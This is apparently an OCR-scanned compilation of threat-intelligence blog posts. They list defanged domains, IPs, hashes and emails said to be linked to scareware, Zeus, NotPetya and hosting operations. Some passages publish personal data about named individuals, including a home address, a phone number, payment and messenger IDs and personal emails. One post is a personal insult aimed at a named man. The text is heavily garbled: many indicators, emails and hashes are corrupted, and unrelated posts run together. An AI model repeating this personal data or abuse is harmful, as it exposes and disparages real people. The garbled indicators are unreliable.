correctly. Update your software 
immediately! 


Registry doctor 


Security under threat! a) 


The component providing security 


has detected a critically low level = 2 
Firewall 


of protection. Make sure that all 


goscantoil. com - Email: jowimpee@gmail.com 

goscantrio. com - Email: crschuma@gmail.com 
goscanxtra. com - Email: crschuma@gmail.com 
gosolescan. com - Email: geofishe@gmail.com 

gotoilscan. com - Email: jowimpee@gmail.com 

gotrioscan. com - Email: momorule@gmail.com 
gowellscan. com - Email: stinfins@gmail.com 


goxtrascan. com - Email: momorule@gmail.com 
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[28] 
Among the actual domains known to be part of the Try2Check cybercriminals enterprise in- 
clude: 
hxxp://try2services[.]pm 
hxxp://try2services[.Jcm 
hxxp://try2services[.]vc 
including the following domain: 
hxxp://just-buy[. Jit 


including the following two ICQ numbers 855377 and 555724 and let’s don’t forget his personal 
email address accounts obtained using public sources which are polkas@bk.ru nordexin@ya.ru 


camcan.us GaorsaYading us fransfertecks us 
[29] Bishop u whataappbusiness u 


and it doesn’t get any better than this as we've got a pretty good and informative domain port- 
folio registered by the same individual based on public information sharing the same domain 
registration details such as for instance hxxp://worldissuer[.]biz which actually are: 
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hxxp://cloud-mine[.]me 
hxxp://gpucloud[.]org 
hxxp://hyperhost[. Jinfo 
hxxp://miservers[. ]info 
hxxp://carterdns[.]com 
hxxp://reshipping[.]us 
hxxp://keyserv[. Jorg 
hxxp://antmining[. ]biz 
hxxp://investmentauditor[.]Jcom 
hxxp://sunnylogistics[.]us 
hxxp://try2services[.]cm 
hxxp://greatwallhost[.]net 
hxxp://jaqjckugrfffga[.]Jcom 
hxxp://numberoneforyou[.]net 
hxxp://getprofitnow[.]biz 
hxxp://avsdefender[.]com 
hxxp://spyware-defender[.]com 
hxxp://beta-dns[.]net 
hxxp://mpm-profit-method[.]com 
hxxp://public-dns[.]Jus — related including this 


[30] 


® 


public-dns_us 


hxxp://adobe-update[.]Jnet — Email: krownymaradonna@onionmail.org related domains 
known to have been involved in the campaign include — hxxp://amazon-clouds[.]com; 
hxxp://microsoft-clouds[.]net; hxxp://telenet-cloud[.]com; hxxp://vmware-update[.]Jcom 
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hxxp://kwitri[. ]net 
hxxp://dcm-trade[.]Jcom 
hxxp://karoospin[.]biz 
hxxp://fastvps[.]biz 
[32] 


& 8 2s 


Evgeniy Mikhaylovich Bogachev 


[33] 


Sample Personal Photos of Evgeniy Mikhaylovich Bogachev: 


[34] 
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Slavik’s IM and personal email including responding IP: 
bashorg@talking.cc — 112.175.50.220 

Personal Address: 

Lermontova Str. Anapa, Russian Federation 

Instant Messaging account: 

lucky12345@jabber.cz 

Related name servers: 

ns.humboldtec.cz — 88.86.102.49 

ns2.humboldtec.cz — 188.165.248.173 

Related domains part of a C &C phone-back location: 
hxxp://slaviki-res1.com 

hxxp://slavikl.com — 91.213.72.115 
hxxp://slavik2.com 

hxxp://slavik3.com 

Slavik’s primary email: 

luckycats2008@yahoo.com 

Slavik’s ICQ numbers: 

ICQ — 42729771 

ICQ — 312456 

Related emails known to have participated in the campaign: 
alexgarbar-chuck@yahoo.com 
bollinger.evgeniy@yandex.ru 
charajiangl16@gmail.com 

Related domains known to have participated in the campaign: 


hxxp://visitcoastweekend.com — 103.224.182.253; 70.32.1.32; 192.184.12.62; 141.8.224.93; 
69.43.160.163 


hxxp://incomeet.com — 192.186.226.71; 66.199.248.195 
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hxxp://work.businessclub.so 

Real Name: Galdziev Chingiz 

Related domains known to have participated in the campaign: 
hxxp://fizot.org 

hxxp://fizot.com — 50.63.202.35; 184.168.221.33 

hxxp://poymi.ru — 109.206.190.54 

Related name servers known to have participated in the campaign: 
ns1.fizot.com — 35.186.238.101 

ns2.fizot.com 

Related domain including an associated email using the same name server: 
hxxp://averfame.org — harold@avereanoia.org 

Google Analytics ID: UA-3816538 

Related domains known to have participated in the campaign: 
hxxp://awmproxy.com 

hxxp://pornxplayer.com 

Related emails known to have participated in the campaign: 
fizot@mail.ru 

xtexgroup@gmail.com 

xtexcounter@bk.ru 


Related domains known to have responded to the same malicious and fraudulent IP — 
178.162.188.28: 


hxxp://dnevnik.cc 
hxxp://xvpn.ru 
hxxp://xsave.ru 
hxxp://anyget.ru 
hxxp://nezayti.ru 
hxxp://proproxy.ru 
hxxp://hitmovies.ru 
hxxp://appfriends.ru 
hxxp://naraboteya.ru 
hxxp://naraboteya.ru 
hxxp://awmproxy.com 
hxxp://zzyoutube.com 
hxxp://pornxplayer.com 
hxxp://awmproxy.net 
hxxp://checkerproxy.net 
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Related domains known to have participated in the campaign: 
hxxp://fizot.livejournal.com/ 

hxxp://russiaru.net/fizot/ 

Instant Messaging Account: 

ICQ — 795781 

Related personally identifiable information of Galdziev Chingiz: 
hxxp://phpnow.ru 

ICQ — 434929 

Email: info@phpnow.ru 

Related domains known to have participated in the campaign: 
hxxp://filmv.net 

hxxp://finance-customer.com 

hxxp://firelinesecrets.com 

hxxp://fllmphpxpwqeyhj.net 

hxxp://flsunstate333.com 

Related individuals known to have participated in the campaign: 


Slavik, Monstr, l1OO, Nu11, nvidiag, zebra7753, lexa_Mef, gss, icelX, Harderman, Gribodemon, 
Aqua, aquaSecond, it, percent, cp01, hct, xman, Pepsi, miami, miamibc, petrOvich, Mr. ICQ, 
Tank, tankist, Kusunagi, Noname, Lucky, Bashorg, Indep, Mask, Enx, Benny, Bentley, Denis 
Lubimov, MaDaGaSka, Vkontake, rfcid, parik, reronic, Daniel, bx1, Daniel Hamza, Danielbx1, 
jah, Jonni, jtk, Veggi Roma, D frank, duo, Admin2010, h4xOrdz, Donsft, mary.J555, susanneon, 
kainehabe, virus e 2003, spaishp, sere.bro, muddem, mechanizm, vlad.dimitrov, jheto2002, 
sector.exploits 


Related Instant Messaging accounts and emails known to have participated in the campaign: 
iceix@secure-jabber. biz 
shwark.power.andrew@gmail.com 
johnlecun@gmail.com 
gribodemon@pochta.ru, 
glazgo-update-notifier@gajim.org 
gribo-demon@jabber.ru 
aqua@incomeet.com 
miami@jabbluisa.com 
um@jabbim.com 
hof@headcounter.org 
theklutch@gmail.com 
niko@grad.com 
Johnny@guru.bearin.donetsk.au 
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petrOvich@incomeet.com 
mricq@incomeet.com 
T4ank@ua.fm 
tank@incomeet.com 
getreadysafebox.ru 
john.mikleymail.com 
alexeysafinyahoo.corn 
rnoscow.berlin@yahoo.com 
cruelintention@email.ru, 
bind@ernail.ru 
firstmen17@rarnbler.ru 
benny@jabber.cz 
airlord1988@gmail.com 
bxI|I@hotmail.com 

i _amhere@hotmail.fr 
daniel.h.b@universityofsutton.com 
princedelune@hotmail.fr 

bxl _@msn.com 
danibx|@hotmail.fr 
danieldelcore@hotmail.com. 
d.frank@jabber.jp 
d.frank@Onl1ine.at 
duo@jabber.cn 
fering99@yahoo.com 
secustar@mail.ru 
h4x0rdz@hotmail.com 
Donsft@hotmail.com 
mary.j555@hotmail.com 
susanneon@googlemail.com 
kainehabe@hotmail.com 
virus e@ 2003@hotmail.com 
spanishp@hotmail.com 
sere.bro@hotmail.com 
lostbuffer@hotmail.com 


lostbuffer@gmail.com 
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viad.dimitrov@hotmail.com 
jheto2002@gmail.com 
sector.exploits@gmail.com 
Aleksei Belan 


[35] 
Sample Personal Photo of Aleksei Belan 
Sample domains known to have been involved in the campaign: 
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177438065 1@aq. com moy yawhGogral com 
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Sample personally identifiable email address accounts known to have been involved in the 
campaign: 


moy.yawik@gmail.com 
moy-yawik@bk.ru 

Sample known responding IPs known to have been involved in the campaign include: 
77.221.159.235 

62.76.182.72 

62.76.190.68 

185.50.25.13 

104.18.41.143 
198.54.117.212 
104.18.40.143 

Mykhaylo Sergiyovich Rytikov 
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Sample Personal Photo of Mykhaylo Sergiyovich Rytikov 
Known domains affiliated with AbdAllah Internet Hizmetleri: 
hxxp://tiket[.]cc 

hxxp://abdulla[.]cc 


hxxp://privateforum[.]cn _— upomajuliya745@gmail.com; xpj88kf@gmail.com; 
316411856@qq.com 
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Related known domains affiliated with AbdAllah Internet Hizmetleri: 
hxxp://ns1[.]srv4u[.]biz 

hxxp://bulletproof-service[.]com — Email: support@hosting-offshore.biz — 202.83.212.250 
hxxp://tarahost[.]net — Email: konstantin@karyaev.com — 89.108.73.93 


[39] 
eee « 
31641 1S5€@aqq.com « 


® ® ® 


gutuman.cn scty007.cn bye260.cn 


oy G oF 


cdi bBOSESS4a8ec 1 b3dch43c9S2a2adf 30 ifedeS2idde32809b4s5s462a08abf dco2afTo95024detSd3f21Ses725657ee 


Related domains known to have been registered by the same domain registrant: 
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iantiviruspro .com - Email: broderma@gmail.com 
iantivirus-pro .com - Email: feetecho@gmail.com 
ia-pro .com - Email: abuse@domaincp.net.cn 
iav-pro .com - Email: mcgettel@gmail.com 

in5ch .com - Email: getoony@gmail.com 

in5cs .com - Email: getoony@gmail.com 

in5ct .com - Email: phounkey@gmail.com 

in5id .com - Email: getoony@gmail.com 

in5it .com - Email: phounkey@gmail.com 

in5iv .com - Email: phounkey@gmail.com 

in5st .com - Email: getoony@gmail.com 

inavpro .com - Email: thdunnag@gmail.com 
scanatom6 .com - Email: sckimbro@gmail.com 
windoptimizer .com - Email: wousking@gmail.com 
wopayment .com - Email: broderma@gmail.com 


woptimizer .com - Email: broderma@gmail.com 


cafropy .cn - Email: spscript@hotmail.com 
cakevy .cn - Email: spscript@hotmail.com 
dotqyuw .cn - Email: spscript@hotmail.com 
dovnaji .cn - Email: spscript@hotmail.com 
dovzyag .cn - Email: spscript@hotmail.com 
dozabes .cn - Email: spscript@hotmail.com 
ducyqan .cn - Email: spscript@hotmail.com 


duvaba .cn - Email: spscript@hotmail.com 
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hxxp://all-mafia[.]net 


hxxp://shampanskoe[. ]info 


hxxp://mashost[.]org 


hxxp://flexi-domains[.]Jcom 


hxxp://5pagess[.]net 
hxxp://extrasoft[. ]biz 


hxxp://golovolomkal[. ]info 


hxxp://optical-coatings[.]info 


hxxp://polevoil.]info 
hxxp://belorussia[.]info 
hxxp://3alab[.]Jcom 
hxxp://prezervativ[.lorg 
hxxp://brodyaga[.]net 
hxxp://skramedia[.]com 
hxxp://tarafree[.]Jcom 
hxxp://mp3-mmf[.]Jcom 
hxxp://myprogal[.]net 
hxxp://extrahost[.]su 
hxxp://garanthost[.]com 


hxxp://grand-host[.]net 


hxxp://technormativ[.]info 


hxxp://xp-hosting[.]net 
hxxp://kredits[.Jcn 
hxxp://tarahost[.]biz 
hxxp://tarahost[.]org 


hxxp://optical-coatings-design[.]info 


hxxp://extrasoft-outsourcing[. info 


hxxp://pm-tost[.]net 
hxxp://pm-sotovik[.]net 
hxxp://pm-ranlix[.]net 
hxxp://pm-holland[.]net 
hxxp://swlul[.Jinfo 
hxxp://valdiss[.]info 
hxxp://karyaev[.]Jcom 
hxxp://x450[.]info 
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hxxp://grand-host[. ]biz 
hxxp://flexi-classifieds[.]Jcom 
hxxp://flexi-sitebuilder[.]Jcom 
hxxp://flexi-projects[.]Jcom 
hxxp://bloggast[. ]info 
hxxp://pereezd-pro[.]info 
hxxp://eduaction|[. info 
hxxp://wmnakovalnya[.]com 
hxxp://retro80x[.]com 
hxxp://tarafree[.]net 
hxxp://skramedial[.]org 
hxxp://oldactors[.]net 
hxxp://tarahost[.]net 
hxxp://janimation[.]net 
hxxp://tarahost[.]Jcom 
hxxp://skramedia[.]biz 
hxxp://vv-want[. info 
hxxp://skramedia[.]net 
hxxp://olimp-sport[.]Jcom 
hxxp://youhouse[. ]biz 
hxxp://kroleki[.]com 
hxxp://extrasoft-projects[. info 
hxxp://zelenaya[.Jcom 
hxxp://cazinowm|[.]com 
hxxp://extrasoft-outsourcing[.]net 


[40] 
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@ 


xpj88kf@gmsail.com 


Zany Zany 
@) @) 
yusnii.com tv7bbs.cn 


iG iG 


67aeQccheS 5b8202e824f5c88dfs951b d039scfb7b0s8053745f1ed0fds05203f 


Related domains known to have been involved with AbdAllah Internet Hizmetleri: 
hxxp://magic-jackpot-cas[.]com 
hxxp://euro-vip-casino[.]com 
hxxp://royal-casino-vip[.]com 
hxxp://sexrusfuck[.]com 
hxxp://royal-cas-vip[.]com 
hxxp://2400-usd-casino[.]Jcom 
hxxp://royalcasino-vip[.]com 
hxxp://2400usd-casino[.]net 
hxxp://eurocasino-vip[.]Jcom 
hxxp://sinlife[.Jcn 
hxxp://byron-consulting-group[.]com 
hxxp://28-07[.]Jcom 
hxxp://28-07[.]net 
hxxp://job-consults[. Jorg 
hxxp://837-86[.]org 
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hxxp://expressdeal[.]biz 
hxxp://cron[. ]li 
hxxp://crons[.]cc 
hxxp://cronos[.]mn 
hxxp://crinc[.Jmn 
hxxp://crinc[. Jli 
hxxp://ultrasmoke[.]cn 
hxxp://supersmoke[.]cn 
hxxp://globalsmoke[.]cn 
hxxp://937-86[.]org 
hxxp://cronco[. Jli 
hxxp://tradegroup-ha[.]Jcom 
hxxp://ha-tradegroup[.]Jcom 
hxxp://crinc[.]jp 
hxxp://tradegroup-ha[.]net 
hxxp://investmentcron[.]cn 
hxxp://glb-soft[.]Jcom 
hxxp://croninv[.]cc 
hxxp://cronis[.]cn 
hxxp://crons[.]Jac 
hxxp://cronn[.]eu 
hxxp://dkebooks[.]Jcom 
hxxp://cronoi[.]cc 
hxxp://jieod[.]Jcom 
hxxp://midgejs[.]Jcom 
hxxp://crin[.]ac 
hxxp://aoejf[.]Jcom 
hxxp://yseac[.]com 
hxxp://kaserid[.]Jcom 
hxxp://crin[.]Jcc 
hxxp://jekdoe[.]Jcom 
hxxp://ujeose[.]com 
hxxp://masiwer[.]Jcom 
hxxp://reusiwe[.]com 
hxxp://kaoeds[.]com 
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hxxp://iwoser[.]Jcom 
hxxp://planetOday[.]biz 
hxxp://xeirod[.]com 
hxxp://neusoas[.]com 
hxxp://geoepd[.]Jcom 
hxxp://efuyr[.]Jcom 
hxxp://ziude[.]Jcom 
hxxp://polsenstanford[.]Jcom 
hxxp://heyud[.]Jcom 
hxxp://wogkr[.]Jcom 
hxxp://seiudr[.]Jcom 
hxxp://aosier[.]Jcom 
hxxp://dueor[.]com 
hxxp://crins[.Jac 
hxxp://verbespecially[.]Jcom 
hxxp://fivejoy[.]Jcom 


hxxp://riverwomen|[.]com 


hxxp://trianglesentence[.]com 


hxxp://floorside[.]com 
hxxp://developtail[.Jcom 
hxxp://womanfinish[.]Jcom 
hxxp://alwaysfell[.Jcom 
hxxp://differcollect[.]Jcom 
hxxp://goodalso[.]com 
hxxp://kingbrought[.]Jcom 
hxxp://findcharacter[.]com 
hxxp://chanceexpect[.]com 
hxxp://beardictionary[.]Jcom 
hxxp://forwardfield[.]Jcom 
hxxp://tinydown[.]com 
hxxp://jobwhether[.]Jcom 
hxxp://numeralcity[.]com 
hxxp://cronin[.]jp 
hxxp://equalcatch[.]com 


hxxp://streamwho[.]com 
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hxxp://selectmonth[.]com 
hxxp://propercame[.]Jcom 
hxxp://grewsoil[.]Jcom 
hxxp://townslip[.]Jcom 
hxxp://stationheavy[.]Jcom 
hxxp://charactereven[.]com 
hxxp://milkOsoft[.]Jcom 
hxxp://goldverb[.]com 
hxxp://windowlisten[.]com 
hxxp://bqgqnfc[.]Jcn 
hxxp://wrbhnuw[.]cn 
hxxp://a9da6[. org 
hxxp://04ccc408[.]org 
hxxp://bdb7beb6[.]org 
hxxp://scalespread[.]Jcom 
hxxp://thencloud[.]com 
hxxp://figurespoke[.]com 
hxxp://fullfraction[.]com 
hxxp://propertytall[.Jcom 
hxxp://beautyfig[.]com 
hxxp://nadover[.]Jcom 
hxxp://followsalt[.]Jcom 
hxxp://staysay[.]com 
hxxp://nerexcept[.]Jcom 
hxxp://thanscore[.]com 
hxxp://humanthus[.]com 
hxxp://branchfelt[.]Jcom 
hxxp://areacountry[.]Jcom 
hxxp://meetduring[.]com 
hxxp://movestood[.]Jcom 
hxxp://stillverb[.]com 
hxxp://suggesteye[.]com 
hxxp://preparebut[.]com 
hxxp://hurrysound[.]Jcom 
hxxp://cookcompare[.]com 
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hxxp://Odaycod[. ]biz 
hxxp://europeansmoke[.]cn 
hxxp://sprybog[.]net 
hxxp://taybaol[.Jcom 
hxxp://polsenstanford[.]Jcom 
hxxp://bconsgroup[.]com 


GRU’s Unit 74455 “NotPetya” 
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URL: linuxkrnl.net/ 
IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute-Lamazonaws.com 


GeolP: 8 US - AS14618 (AMAZON-AES, US) 


URL: linuxkrnl.net 
IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute- Lamazonaws.corm 
GeolP: 8 US - AS14618 (AMAZON-AES - Amazon.com, Inc. US 


URL: linuxkrnl.net 
IP: 52.45.178.122 - PTR: ec2-52-45-178-122.compute- Lamazonaws.com 


GeolP: Ss US 


URL: linuxkrni.net/ 
IP: 52.45.178.122 - PTR: ec2-52-45-178-1 pute-Lamazonaws.com 


+) 444 T 
GeolP: 8 US - AS14618 (AMAZON-AES - Amazon.com, Inc., US 


Sample screenshots of the GRU’s Unit 74455 “NotPetya” malware gang obtained using public 
sources: 


[42] 


@ 


eila77 @cock ti 


© © 


euronews24 info naoasch com 


[43] 
28189 


@ 


contact_r.zeteny@keem ail._me 


© © 


um 10esetnet as23-updater-sym antec.org 


[44] 


@ 


jada okee &15@m ail.com 


4 ‘ 
Zany Zany 
® © 


generalsecuritycorp.org§ = reservecorpind.com 


[45] 


@ 


ifatley@openm ailboxorg 


¥ ~% 


Fo Lan» 
® ©® 
mvsband com mdversion net 

[46] 


28190 


@ 


joaquin_garcia@gmxch 


~ 


o Zan 
-_ @) 
newélm ts.com healthkeeping org 


[47] 


am antatuiterama@n ai com preem We 2024@e an com 


v « 


Pngremeteon Oy 


[48] 


@ @ @ 


romergpnal com Torey @eutancta com Yyd_engoy@t26. com 


, “ 
v Vv v Oy ® 
hreter Com reathienky com 
¥ 


[49] 


28191 


© @ @ 
=» 
—- 2 _— @——-@ 
@ 
7 Yio @ 
@ 
[50] 
® @®) 


28192 


duvegy .cn - Email: spscript@hotmail.com 
duwbiec .cn - Email: spscript@hotmail.com 
duxsoez .cn - Email: spscript@hotmail.com 
duzebyn .cn - Email: spscript@hotmail.com 
dybapi .cn - Email: spscript@hotmail.com 
dyqkuam .cn - Email: spscript@hotmail.com 
dyqunre .cn - Email: spscript@hotmail.com 
dytrevu .cn - Email: spscript@hotmail.com 
dyzani .cn - Email: spscript@hotmail.com 
ebaetu .cn - Email: spscript@hotmail.com 
ebeoxuw .cn - Email: spscript@hotmail.com 
ebeozag .cn - Email: spscript@hotmail.com 
edogeg .cn - Email: spscript@hotmail.com 
epuneyv .cn - Email: spscript@hotmail.com 


epuvyiz .cn - Email: spscript@hotmail.com 


2822 


[52] 


[54] 
28193 


[55] 


[56] 


28194 


Igor Dehtyarchuk 
28195 


[60] 


Sample Personal Photo of Igor Dehtyarchuk 


Sample emails known to have been involved in the campaign include: 


abuse@shopsn.su 
dimetr801@mail.ru 
admin@4server.su 
ssg.apple77@gmail.com 


®) 


4serversu 


© 


ebayshop.su 


®) 


cjmarket.net 


®) 


4host.su 


® 


csgoacc.ru 


© 


globus-base.su 


®) 


vkaccounts.com 


® 


tgshop.su 


marketsales.su 


® 


broshop.su 


®) 


cheapaccounts.su 


® 


4ns.su 


®) 


Zarmo.su 


®) 


deersu 


® 


ytuber.su 


® 


4dedic.su 


® 


4domains.su 


® 


shopsn.su 


®) 


vds4u.su 


® 


time-hack.su 


Sample domains known to have been involved in the campaign include: 


hxxp://4server.su 
28196 


hxxp://cSgoacc.ru 
hxxp://marketsales.su 
hxxp://zarmo.su 
hxxp://4domains.su 
hxxp://ebayshop.su 
hxxp://globus-base.su 
hxxp://broshop.su 
hxxp://deer.su 
hxxp://shopsn.su 
hxxp://cjmarket.net 
hxxp://vkaccounts.com 
hxxp://cheapaccounts.su 
hxxp://ytuber.su 
hxxp://vds4u.su 
hxxp://4host.su 
hxxp://tgshop.su 
hxxp://xn — 227-qdd4dec.xn — placf 
hxxp://4dedic.su 
hxxp://time-hack.su 
hxxp://4ns.su 

Sample screenshot: 


Oleksandr Vitalyevich leremenko 


rere 
[62] Sn. edd 


Sample Personal Photo of Oleksandr Vitalyevich leremenko 
Handle: Zl0m; Lamarez; Ded.MCz; |@m@rEz 


Email: lamarez@mail.ru; uaxakep@gmail.com — xeljanzusa.com — _ 62.109.25.228 
(hxxp://www.secureworks.com/research/point-of-sale-malware-threats); 62.109.1.69 


Commpany: 2016 K3epokc 
28197 


Phone: +7 951 366 17 17 

ICQ: 123424 

Web Money: 258807111393 

Related URLs: 
hxxp://ageline.ru/lamarez.php 
hxxp://kOx.ru/md5.salt.tx 
hxxp://kOx.ru/ _bot.exe — 82.146.60.59 
hxxp://kOx.ru/black energy 31337 /stat.php 
hxxp://kOx.ru/siicywu36dswh/addddos.php 
hxxp://xtoolz.ru 

hxxp://cup.su 

hxxp://xwarez.us 
hxxp://kinoafisha.ua/news/lamarez-was-here 
hxxp://post-tracker.ru 

hxxp://zr.ru 

hxxp://business-gazeta.ru 
hxxp://proshkolu.ru 

hxxp://opengost.ru 

hxxp://krokha.ru 

hxxp://eurolab.ua 

hxxp://newsdon. info 

hxxp://dirt.ru 

hxxp://anime-zone.ru 

hxxp://rus.kg 

hxxp://badger.ru 

hxxp://fedpress.ru 

hxxp://carsguru.net 

hxxp://findfood.ru 

hxxp://beboss.ru 

hxxp://vidal.ru 

hxxp://reghelp.ru 

hxxp://rabotagrad.ru 
hxxp://proshkolu.ru 

hxxp://muztorg.ru 

hxxp://mirf.ru 

28198 


hxxp://medgorodok.ru 
hxxp://dobrota.ru 
hxxp://cooksa.ru 
hxxp://consmed.ru 
hxxp://buro247.ru 
hxxp://3dmir.ru 
hxxp://novorus.info 
hxxp://kidbe.ru 
hxxp://eknigi.org 
hxxp://2*2.Su 

Exante LTD — XNT Ltd. — exante.eu 
Danil Potekhin 


[63] 
Sample personal Web site: hxxp://agressivex.com 


[64] 


Agressivex AndroBot 


Login 


Sample personal email: potekhinl4@bk.ru 
Sample MD5 known to have participated in the campaign: 
MD5: ecb347518230e54c773646075e2cc5ea269dcf8304ad102cee4aae75524e4736 
Happy research! 
28199 
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19.9.10 Exposing the Bulgarian Cyber Army Cyber Threat Actor (2023-09-18 12:28) 


[1] 


Anonymous Bulgaria is your typical Anonymous “franchise” Anonymous hackers model where 
you have a group of people doing web site defacements and compromises of legitimate web 
sites and infrastructure and actually blame a bigger cause that they don’t really have anything 
to do with and don’t understand or know anything about it. 


The ultimate goal here would be for the group to gain momentum including to attract followers 
where the ultimate goal would be to spread a message that they don’t often understand or 
have anything to do with low profile DDoS attacks or cyber attack attempts similar and typical 
to the Anonymous hackers collective idea. 


Is it script kiddies or low profile wannabe hacker groups that basically have one social media 
account and are capable of launching low profile cyber attack attempts that often make the 
news or is it a bigger conspiracy where everyone doing the same can outsource their respon- 
sibility for doing it to the entire “idea” which basically represents an Anonymous set of people 
attempting to do low profile cyber attack attempts? 


[2] 
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Son of a bitch! 
Where’s My Page? 


it seems like this page uses JavaScript code that conficts with Ruffle 


Let’s go for the first part. 


The important part when dealing with this type of low profile threat actor is to usually keep 
track of their activities including social media profiles and activity and look for additional clues 
in terms of current and ongoing cyber attacks and most importantly look for additional clues 
such as personally identifiable information which would be later on used in a possible cyber 
threat actor attribution campaigns including for the actual enrichment of this PII for the purpose 
of looking for additional clues in terms of doing threat actor infrastructure reconnaissance 
on your way to look for additional clues such as related malicious and fraudulent including 
cybercrime activity including domains personally identifiable email address accounts or related 
social media accounts. 


BgWorm 


The ultimate goal when collecting these would be yo either build a database of the threat actor 
in question which could lead to a possible commercial or community driven project venture 
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or to assist fellow researchers and Law Enforcement on its way go track down monitor and 
prosecute these individuals. 


[4] 


In this article I’ll discuss in-depth the Anonymous Bulgaria hacker franchise that basically just 
like many other Anonymous franchises across the globe basically represent low profile cyber 
attack attempts type of threat actors and will provide personally identifiable information on 
their online whereabouts. 


[5] 
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Some of the other Bulgarian Web site defacement groups that are known to work and coop- 
erate with Bulgarian Cyber Army include BG Worm, MTH Soft, Hack3D TeaM and EvilHack and 
Anonymous Bulgaria. 


[6] 
28206 


What’s specifically interesting about Bulgarian Cyber Army is that the group appears to be still 
and currently active and operational based on some of their latest web site defacement and 
Facebook activity. 


Personally Identifiable Information on Bulgarian Cyber Army: 
hxxp://facebook.com/hack3dteam 
hxxp://vimeo.com/user16145338/videos 
Personally Identifiable Information on Hack3d Team: 
MaStErHaCk 
Slackera 
Tiger 
RTFM 
Sspdf11 
Pantelix 
Metalqear 
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MaStErChO 

W!PS 

TraferA 

3ikmy 

rOOtkit 

The Godfather 

razora911 

Personally Identifiable Information on EvilHack: 
EvilHack[.]hmamail.com 
anonyops|[.]Jabv.bg 

genadi 100[.]abv.bg 

evil hack[.Jabv.bg 

evilhack[.]bk.ru 
evilhackO0O[.]gmail.com 
clangrf[.]abv.bg 
hxxp://anonymous-world.free.bg 
hxxp://web-dangerous.free.bg 
hxxp://evilhack-official.blogspot.com/ 
Personally Identifiable Information on Anonymous Bulgaria: 
NoTolerance 

Hades 

PsychoPatternz 

rootheR _ 


hxxp://anonbg.info 
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https ://blogger . googleusercontent . com/img/a/AVvXsEgX5Wq4KYuk2gI-VV1M1b0aI pf eE1U2AVBkGcO2PbuGf qwP6Tr-5CF {Vj 
hq7Y7RUfxuA_MFAUNYJf£_NXmDWMi6iZ3bUE6VzUv85nUuoulP8_1_ 


3. https: //blogger . googleuser content . com/ing/a/AVVIsEiqS-x_vt6XN9xtg-bGSB jSDdHBUV52JgN3py tESKDM_nyIOJErSVjVZV 
ysiAU5qr4R2wzkNG12PtX3ufu3vdjMmvHv2RM1x9LMbAvacaNC-LSP 
5. https: //blogger . googleusercontent . com/img/a/AVvXsEgyRFhUqMAAoEeELegkD9 Jo6 1QEgZfHxnZQ0 j-cebL IvWrayho1PqCséd 
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19.9.11 Applying for the Rewards for Justice on the Conti Ransomware Gang Pro- 
gram (2023-09-18 20:08) 


[1] 


Dear blog readers, 


This is Dancho and | have some news. | just applied for the United States Rewards for Justice 
program on the Conti Ransomware Gang and | identified myself with my research and analysis. 


[2] 
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Rewards_For_Justice_ Dancho_Danchev_Conti_Ransomware_Gang_Bitzlato_Cryptocurrrency_Exchange_OSINT_Photos_2023_01 
Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_Fashion_Brands_Photos_2023_01 
Trickbot_Gang_Sanctions_OSINT_Analysis_Photos_2023_01 
Trickbot_Gang_Sanctions_OSINT_Analysis_Photos_2023_02 
Trickbot_Gang_Sanctions_OSINT_Analysis_Research_2023_01 

=) Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_Email_Address_Accounts_2023_01 

fa Rewards_For_lustice_Dancho_Danchev_Conti_Ransomware_Gang_In_Depth_OSINT Analysis 

=) Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_Internal_Leaked_URLs_Compilation_2023_01 

=} Rewards_For_Justice_Dancho_Danchev_Conti_Ransomweare_Gang_XMPP_Jabber_Account_IDs_2023_01 

pe | Rewards_For_lustice Dancho_Danchev_STDCSTIX2_loC_Conti_Ransormware_Gang_01 

Rewards_For_Justice_Dancho_Danchev_Trickbot_Gang_Bitzlato_Cryptocurrency_Exchange_OSINT_Analysis 

2} Rewards_For_Justice Dancho_Danchev_Trickbot_Gang_Email_Address_Accounts_2023_01 

Ww) Rewards_For_lustice_Dancho_Danchev_Trickbot_Gang_In_Depth_OSINT_Analysis 

9 Rewards For_Justice Trickbot_Internal_Leaked_Chats_2023_01 

po | Rewards_For_lJustice_Trickbot_Internal_Leaked_Communication_Profiles_2023_ 01 


Wish me luck. 
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Stay tuned. 


1, https: logger. googleusercontent con/ing/a/AV ke j2Ki9pLTTHKToyDt Hii SFS2aF RSE gyOk_ 2314, b0-LiDyaVodd 
2, hetps: //blogger .googleusercontent.con/ing/a/AV®KsEi j6F-Red_ just OiPlnx21TGydrPLvYgixka-~BGnval VKOvSbsKorqyr 
3, https://blogger -googleusercontent.con/ing/a/AVYKeEikot IV8_KT3HS MinunlGehinBad0OkyPO59Y JaFViUyoAdPhir au 


19.9.12 Yavor Kolev - Part Two (2023-09-18 20:39) 


Dear blog readers, 


Are you in a desperate need to reach out to someone who's basically the exact definition of 
a toilet person? Is it the taste or is it the smell? Is it the desperate need or the promise for 
something cool and interesting? 


Let’s start from the basics by defining the terms. Just what exactly a toilet person is? A toilet 
person but correct me if I’m wrong since | don’t mean to be weird knowing this is someone 
supposedly thinking that first of all the toilet is a cool thing and most of all since the person 
is Supposedly thinking he’s also cool he should either buy a toilet or live and work there. In a 
toilet? A toilet through the perspective of a toilet person is an entire universe and let’s don’t 
forget a supposedly something that although he wouldn’t understand at the beginning an entire 
dimension. 


A second logical question emerges? Is the very bottom of your pathetic and moronic existence 
and should the very spitness and social vomitness of your irrelevant social existence set an 
example for others? 

The answer is no. 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEhzIp-RfYWpOhPSgZxWBw3YausW2mP4boSmkyC8Uce35cpNEuWMpa2Ga 
yh9GIvH3GCkU2-RrbpZB1leRXLX-X- 5WLezQ1-O0JOVhOnDc-Hv4Ux 
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19.9.13 A New DIY Grim Android Botnet Spotted in the Wild (2023-09-18 23:45) 


[1] 


| just came across to a newly released DIY Android Botnet with some pretty interesting built-in 
features including the use of mobile-based ransomware device locking capability including to 
offer the attacker the capability to take full control of the Android device for various purposes. 


Sample screenshots: 


[2] 
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erujale .cn - Email: spscript@hotmail.com 
eruqav .cn - Email: spscript@hotmail.com 
esuteyb .cn - Email: spscript@hotmail.com 
etuacwo .cn - Email: spscript@hotmail.com 
etuexyp .cn - Email: spscript@hotmail.com 
etyawjo .cn - Email: spscript@hotmail.com 
etykauw .cn - Email: spscript@hotmail.com 
evaolux .cn - Email: spscript@hotmail.com 
